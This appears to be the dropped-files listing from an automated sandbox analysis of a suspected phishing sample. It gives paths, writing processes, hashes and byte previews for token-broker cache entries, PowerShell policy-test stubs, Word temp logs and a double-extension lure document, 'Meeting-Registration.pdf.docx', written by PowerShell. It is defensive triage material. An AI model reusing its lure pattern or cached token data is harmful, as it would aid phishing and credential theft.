                                                                                  Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".C.J.1.m.u.g.S.o.z.s.S.9.x.S.Z./.Q.v.O.c.+.E.J.4.u.2.c.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.G.D.A.t.c.o.x.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.O.r.8.X.n.J.

                                                                                  C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\56a61aeb75d8f5be186c26607f4bb213abe7c5ec.tbres

                                                                                  Download File
                                                                                  Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):4542
                                                                                  Entropy (8bit):4.00228081716882
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:uiTrlKxxxX2xD9Il8uabkHxQJndGajXZK8HI0hxESGdc7W8ei15A5wBbWly7RYZK:pYnHxQjYwhxEH8hAaBbiyaUr9qxumVoD
                                                                                  MD5:E770E513CF39F9FB431ACF6F3F413B2C
                                                                                  SHA1:65092380E5BD260D8C9171C222DBBBFEDC0985A7
                                                                                  SHA-256:1BB986AC5C6F02C49E687709F529245DEEC6DB3EECFF916A11E4BF7E9AE22213
                                                                                  SHA-512:78DA7DE881181AEBBFD915032F519A0A7BD4C2CE663D086AED36A2302970B3AE057372A86F2B652868C7754574FB201B9D5C1442B0ACE520BCA53AA8BA35E319
                                                                                  Malicious:false
                                                                                  Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".V.q.Y.a.6.3.X.Y.9.b.4.Y.b.C.Z.g.f.0.u.y.E.6.v.n.x.e.w.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".K.C.K.3.m.8.I.x.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.w.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.O.r.8.X.n.J.

                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{8A10E447-B697-402A-B5EC-AF72B96BB41D}.tmp

                                                                                  Download File
                                                                                  Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):3040
                                                                                  Entropy (8bit):3.5377940184093926
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:cfNhiRuLndkS+wub4jN7tNXOkzCeBRN1Hiw0c2ey/q/aZ1yYs5qjhVLxCcyDRsn2:cfNhzLdkS+R5LS21qCZ1yJ5qjPAtRsn2
                                                                                  MD5:103A36557D0CD39754531EEE87F0D523
                                                                                  SHA1:F045CA1D92A03F1A534352761059068D86FC7E2B
                                                                                  SHA-256:EC576282A853E2475039263EB5880B5CBDEA8AA8F602AC6B75F8E69F84EB8A4F
                                                                                  SHA-512:20C333712F83E9E91C69BA707BBA8932F337D2EEF893E4210839CF1D0D1187D64059D28F97DC0A08531A796F276F061801E3FF3934F1B5BADB6D0507C599E94D
                                                                                  Malicious:false
                                                                                  Preview:..M.e.e.t.i.n.g. .R.e.g.i.s.t.i.o.n...R.e.c.i.p.i.e.n.t.'.s. .A.d.d.r.e.s.s.:...H.a.v.a.s. .G.l.o.b.a.l. .(.D.i.g.i.t.a.l. .N.a.t.i.v.e.)...7.8.9. .O.a.k. .D.r.i.v.e...C.i.t.y.v.i.l.l.e.,. .U.S.A. .6.7.8.9.0.....D.e.a.r.,.....I. .a.m. .w.r.i.t.i.n.g. .t.h.i.s. .l.e.t.t.e.r. .t.o. .c.o.n.f.i.r.m. .o.u.r. .i.n.t.e.r.v.i.e.w. .s.c.h.e.d.u.l.e.d. .o.n. .1.1./.2.5./.2.0.2.4. .a.t. .6. .p...m... .I. .a.m. .e.x.c.i.t.e.d. .t.o. .m.e.e.t. .y.o.u. .a.n.d. .d.i.s.c.u.s.s. .t.h.e. .d.e.t.a.i.l.s. .o.f. .o.u.r. ...............&...................$...&...D...F...............................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{FE5297EC-3C31-4700-87C3-A1B8F28744AE}.tmp

                                                                                  Download File
                                                                                  Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):1024
                                                                                  Entropy (8bit):0.05390218305374581
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:ol3lYdn:4Wn
                                                                                  MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                                                  SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                                                  SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                                                  SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                                                  Malicious:false
                                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):20051
                                                                                  Entropy (8bit):5.024314565257015
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:KiQ0HzAF1FXX359ib4DVVHWrxpUUpXoCwiopbjvwRjdvRlYfWkib45OvQJvOjJx:KinHzwbH3FVVHWrxpUUpXoCwiopbjoRd
                                                                                  MD5:B5DB685AC5E98A2113E1C2A8E527EAEF
                                                                                  SHA1:C537021918301E68B38AEC4FD24C4D2EE8471A87
                                                                                  SHA-256:F0619199122346C9708E93301C424A8973C6274F18115E1E1DD7C3DA1C14EB0D
                                                                                  SHA-512:C1946C7A30129D644B8959A0033BF6AA279C1A26EC72C349AD679AD1DD6574D6D4EA7C4BCF9D2437A37A7F33C42640DB4AFA74FADD5BA5DDFCFA1624B607EBBB
                                                                                  Malicious:false
                                                                                  Preview:PSMODULECACHE......wMk.z..K...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1........Clear-BitLockerAutoUnlock........Lock-BitLocker........Backup-BitLockerKeyProtector........Resume-BitLocker........Disable-BitLockerAutoUnlock....!...BackupToAAD-BitLockerKeyProtector........Add-BitLockerKeyProtector........Unlock-BitLocker........Enable-BitLockerAutoUnlock........Disable-BitLocker........Remove-BitLockerKeyProtector........Enable-BitLocker........Suspend-BitLocker........Get-BitLockerVolume........@.8o.z..q...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psd1m.......Get-Date........Clear-Variable........Get-EventSubscriber........Import-Csv........Get-Variable........New-Variable........Compare-Object........New-TemporaryFile........Convert-String........New-Alias........Export-Csv........Get-Event........Set-TraceSource........ConvertTo-Csv........ConvertFrom-Json........Get-PSCallStack........

                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):1760
                                                                                  Entropy (8bit):5.664110246776084
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:CSGfs4c4RQmFoUeMmfg9qr9tK8NLn5nOA+S0ax5jl+yU:PGHcIFKLdI9qr2KLn5nOARx3Z0
                                                                                  MD5:E886D6AB09C50DAB8956777209408BB5
                                                                                  SHA1:05AF28F9E54979C91E13E2F167CF2C02FC0D9BB1
                                                                                  SHA-256:AE493285B71C589EC2C65EF1397DED655E6537C9D69141C2CB2BFCF6DDEC33B2
                                                                                  SHA-512:71936FAFAE17111C72BE7CD025411F39783AA34ADA68E59F50958A6FCA1A0EF106B855F4BCB26CC87D77845EAE635733BE40DD1EB9AC2DC59F412F22B8E11150
                                                                                  Malicious:false
                                                                                  Preview:@...e...........R...............................................@...............M6.]..O....PI.&........System.Web.Extensions...H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0...............I.....B..ZR............System..4......................A....E..........System.Core.D................g$H..K..I.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4...............F;7..C..f.G..........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Commands.Utility...

                                                                                  C:\Users\user\AppData\Local\Temp\Diagnostics\WINWORD\App_1731058862900914100_BE046A1B-6334-4DC9-9529-CEEA4357102D.log

                                                                                  Download File
                                                                                  Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                  File Type:ASCII text, with very long lines (28369), with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):16777216
                                                                                  Entropy (8bit):0.1761379502252503
                                                                                  Encrypted:false
                                                                                  SSDEEP:1536:+etxCDuoSM5l53UiFUxjXh4Z1mDe4O2k0icgUKPl2TdllqFpT4FKnjRF4P+ztBN:VtBhM552FKT4z
                                                                                  MD5:A54E3672202C92614D703E9D923D6741
                                                                                  SHA1:E97D7A0E9C0C54B7C8EE000C08369327185DEFBB
                                                                                  SHA-256:DA3F3AE94D454993D268CFD5516229980C67B7C81F4AC45C171722A9B5B74FEC
                                                                                  SHA-512:A5AEA87D3EEAD3AEBC5F145C64C3100513C1B2223FB0E3D0D9C1FCC0AA662CED6F05702FC3DC9C92A3BF03549C5E935070299B626D439432717E66567433CE56
                                                                                  Malicious:false
                                                                                  Preview:Timestamp.Process.TID.Area.Category.EventID.Level.Message.Correlation..11/08/2024 09:41:02.947.WINWORD (0x19B4).0x20B4.Microsoft Word.Telemetry Event.b7vzq.Medium.SendEvent {"EventName":"Office.Experimentation.FeatureQueryBatched","Flags":33777005812056321,"InternalSequenceNumber":29,"Time":"2024-11-08T09:41:02.947Z","Data.Sequence":0,"Data.Count":128,"Data.Features":"[ { \"ID\" : 0, \"N\" : \"Microsoft.Office.Diagnostics.WerCrashDLLEnabled\", \"V\" : true, \"S\" : 11, \"P\" : 0, \"T\" : \"2024-11-08T09:41:02.5883892Z\", \"C\" : \"39\", \"Q\" : 298.0, \"M\" : 0, \"F\" : 5 }, { \"ID\" : 0, \"N\" : \"Microsoft.Office.Telemetry.TrackCPSWrites\", \"V\" : false, \"S\" : 1, \"P\" : 0, \"T\" : \"2024-11-08T09:41:02.5883892Z\", \"C\" : \"33\", \"Q\" : 0.0, \"M\" : 0, \"F\" : 5 }, { \"ID\" : 0, \"N\" : \"Microsoft.Office.Telemetry.CPSMaxWrites\", \"V\" : 2, \"S\" : 1, \"P\" : 0, \"T\" : \"2024-11-08T09:41:02.5883892Z\", \"C\" : \"33\", \"Q\" : 5.0, \"M\" : 0, \"F\" : 5 }, { \"ID\" : 0, \"N\" :

                                                                                  C:\Users\user\AppData\Local\Temp\Diagnostics\WINWORD\App_1731058862901498300_BE046A1B-6334-4DC9-9529-CEEA4357102D.log

                                                                                  Download File
                                                                                  Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):16777216
                                                                                  Entropy (8bit):0.0
                                                                                  Encrypted:false
                                                                                  SSDEEP:3::
                                                                                  MD5:2C7AB85A893283E98C931E9511ADD182
                                                                                  SHA1:3B4417FC421CEE30A9AD0FD9319220A8DAE32DA2
                                                                                  SHA-256:080ACF35A507AC9849CFCBA47DC2AD83E01B75663A516279C8B9D243B719643E
                                                                                  SHA-512:7E208B53E5C541B23906EF8ED8F5E12E4F1B470FBD0D3E907B1FC0C0B8D78EB1BBFB5A77DCFD9535ACF6FA47F4AB956D188B770352C13B0AB7E0160690BAE896
                                                                                  Malicious:false
                                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\Meeting-Registration.pdf.docx

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:Microsoft Word 2007+
                                                                                  Category:dropped
                                                                                  Size (bytes):13576
                                                                                  Entropy (8bit):7.267947119520991
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:CtgStst3yJCCNxtpgoZ22NNBL8U/PSsJ80GnVDLeBUvP43JKto:agSmmdNxt/ZtNNZT/qsPGn5LeqHgJKto
                                                                                  MD5:9B7F51774E87639BA4ABF7CAE65B776A
                                                                                  SHA1:ED10388E01605623883D123A0D8C8F19EE659B3F
                                                                                  SHA-256:9536EBC1FB5DBE6C14BB2D73C66A4863266DA4785ED516C1C8F10182B51F79B3
                                                                                  SHA-512:29A548A876BB0F45D14B0961B7BEBF5BADCD4A4067A733452E164A65A5EC090D43D32A1834541ABB813EA2965649392F3CE15513A91273E000067A8E671B966B
                                                                                  Malicious:false
                                                                                  Preview:PK..........!...lZ... .......[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................n.0.E......Ub.*..>.-R...{.V.......QU...l"%3..3V...l...w%..=...^i7+...-.d.&.0.A.6.l4...L6.0#...S.O.....X...*..V$z.3....3.......%p)O....^......5}nH".d.s.Xg.L.`....|...|.P.r.s.....?.PW...t.t4Q+..".wa...|T\y...,N....U.%...-D/......X...(.....<E....)....;.N..L?.F.........<Fk...h..y........q..i..?..l..i..1...].H.g...m.@.....m........PK..........!.........N......._rels/.rels ...(.......................................

                                                                                  C:\Users\user\AppData\Local\Temp\RES352B.tmp

                                                                                  Download File
                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                  File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x492, 9 symbols, created Fri Nov 8 09:40:51 2024, 1st section name ".debug$S"
                                                                                  Category:dropped
                                                                                  Size (bytes):1336
                                                                                  Entropy (8bit):4.011720277058411
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:HUMm90R7HBwK1mNII+ycuZhNeakSmPNnqSSd:0WR7KK1mu1ulea3aqSC
                                                                                  MD5:73F7F92BA49B170D91275BCA7CCE1C9A
                                                                                  SHA1:81DD218B3963909D5348B2BB16430DE1269EC627
                                                                                  SHA-256:397E48572A132B15CDE7A1F835C7F46815264D6A34AA49CA5A9191F6DA6F1003
                                                                                  SHA-512:14839EDFD28FE71ECA571FD302BA6A4789E4FD1CD398F6F85DA6787663F274B4F54D3CF4A810FD213C17FB7CB5B2A3526D0880754405271B9686AF0623E9EDBF
                                                                                  Malicious:false
                                                                                  Preview:L.....-g.............debug$S........T...................@..B.rsrc$01........X.......8...........@..@.rsrc$02........P...B...............@..@........U....c:\Users\user\AppData\Local\Temp\vz2enilj\CSC2427E8DFE2D64B98811230F26E9EEEB4.TMP..................`>..-..e[.!.`..b..........5.......C:\Users\user\AppData\Local\Temp\RES352B.tmp.-.<....................a..Microsoft (R) CVTRES._.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...v.z.2.e.n.i.l.j...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.

                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3k3jk1sg.c4c.ps1

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4f3wuwyo.v0j.ps1

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ay1kkwm4.r4o.psm1

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cloynwfd.5py.psm1

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dz5py4tk.lso.ps1

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gwfq01xl.fgw.psm1

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oz4n5hxt.ma1.ps1

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_slaqt2hz.trk.psm1

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_u4dxnufn.hqt.ps1

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wvjunkvh.yzr.ps1

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xbthug23.so5.psm1

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
